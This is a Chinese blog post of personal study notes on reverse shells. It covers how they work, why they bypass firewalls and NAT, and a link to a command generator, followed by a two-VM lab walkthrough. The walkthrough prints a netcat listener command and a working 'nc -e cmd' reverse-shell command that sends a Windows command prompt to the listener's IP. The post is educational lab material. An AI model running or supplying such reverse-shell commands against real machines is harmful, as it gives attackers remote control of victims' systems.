首页 > 系统相关 >反弹shell

反弹shell

时间:2022-08-30 22:14:29浏览次数:80  
标签:ip shell 主机 命令 ubuntu 反弹 监听

参考文章:https://cloud.tencent.com/developer/article/1818091

一些概念

原理:

反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。

将权限从一个地方移植到另外一个地方

正向连接:

攻击者在自己的机器上去连接目标主机。远程桌面、web服务、ssh、telnet等等都是正向连接

反向连接:

目标主机去主动连接攻击者自己的主机(受害者主机主动找攻击者主机)

为什么需要反弹shell?

解决数据回显和数据通信这两个问题
数据回显
打个比方,我去利用工具去让服务器执行一条命令,但是我不知道我这个命令到底有没有被执行成功。在渗透测试的绝大部分环境中,是没有数据回显的。我去执行一条下载命令,它可能是不会提醒我说文件下载成功。
数据通信
对于一些交互式命令,我输入一条命令,它会回复我下一步该输啥,但是我可能面临看不见它回复啥的问题。

反弹shell的适用情况:

  • 目标机因防火墙受限,目标机器只能发送请求,不能接收请求

上课时老师提过,一般而言防火墙的入站规则比较严格,不能随便允许外人进入/访问,但是它的出站规则比较简单,一般比较宽松。可以联想一下小兔子乖乖把门开开的故事来理解

  • 目标机端口被占用
  • 目标机位于局域网,或IP会动态变化,攻击机无法直接连接

举个例子,内外网,在内网中会有n台设备共同使用一个ip地址(公网ip)作为数据流量的出口,我可以在内网中去输入外网服务器的ip访问外网中的服务器,但是外网的服务器却无法通过我内网出口的这个ip地址去找到我这台机器,因为这个ip地址下有n台设备共用这个ip地址。

  • 对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知的

2,3,4不能理解,日后再说

实战

反弹shell的实现方式有很多,可以因地制宜进行操作。具体可以参考最上面的文章。
介绍一个工具,可以帮助我们生成反弹shell命令
https://forum.ywhack.com/reverse-shell/
image

使用的两台机器分别为ubuntu,和win10,都运行在虚拟机中,处于同一个内网中。
1.在ubuntu中主机中监听8888端口
nc -lvnp 8888
image
2.查看ubuntu主机的ip地址
ifconfig
image
3.在win10主机中将cmd命令权限移交给ubuntu主机
nc -e cmd 192.168.12.137 8888
image
4.回到我们的ubuntu主机,看看它监听到没有
image
看来是监听到了
5.在ubuntu主机中输入ipconfig命令,看一看win10主机的ip地址信息
image
image
6.实验结束

标签:ip,shell,主机,命令,ubuntu,反弹,监听
From: https://www.cnblogs.com/xjy881/p/16640879.html

相关文章

  • linux shell 中"2>&1"含义
    问题:在编译安卓操作系统的代码时候,一连需要10几个小时,为记录编译过程中间可能出问题,便于调试。需要把编译过程输出到文件。这样也可以设置自动关机了。  解决方案:编......
  • shell编程【一】
    参考网址:【Linux命令大全】[]:https://linux265.com/course/linux-commands.html为什么要学习shell指令?学习shell指令的本身也是在了解Linux系统。shell是开发出来更好地......
  • Power Shell 生成ssh key
    生成新的SSH公私钥对以下PowerShell脚本检查是否存在已有的SSH公私钥对,如果不存在,则生成一对新的公私钥对if((-not(Test-Path-Path$HOME/.ssh-PathTypeConta......
  • gcp平台gcloud shell安装和使用
    参考文档:https://cloud.google.com/sdk/docs/install?hl=zh-cn在服务器上授权gcloud命令1、在iam处添加服务账号  2、授权editor的权限  3、添加密钥  4......
  • jenkins使用shell脚本执行nohup java -jar包失败
    一、问题通过jenkins执行shell脚本时,脚本中是通过nohupjava-jar&的方式启动,显示执行成功,但是服务却没启动,脚本如下:#!/bin/bashnohupjava-Xms800m-Xmx800m-XX:P......
  • 暑假学习6 hdfs shell命令
    命令行操作:cliHadoop的命令shell:Hadoopfs-lsfile:          操作本地的文件系统hadoopfs-lshdfs://node1:8020         ......
  • shell-流程控制
    流程控制执行脚本case语法case实例......
  • shell-条件判断
    条件判断{{uploading-image-700989.png(uploading...)}}......
  • shell #!/bin/bash: No such file or directory报错
    写了个shell脚本第一行是#!/bin/bash执行时报错#!/bin/bash:Nosuchfileordirectory虽然不影响执行,但是每次都报这个错误看着很别扭百度了一下,因为我这个sh文件是......
  • xshell频繁断开
    原文:xshell频繁断开原因,提示SocketerrorEvent:32Error:10053连接失败_Aaron__Gao的博客-CSDN博客 SocketerrorEvent:32Error:10053_五维空间-影子的博客-CSDN......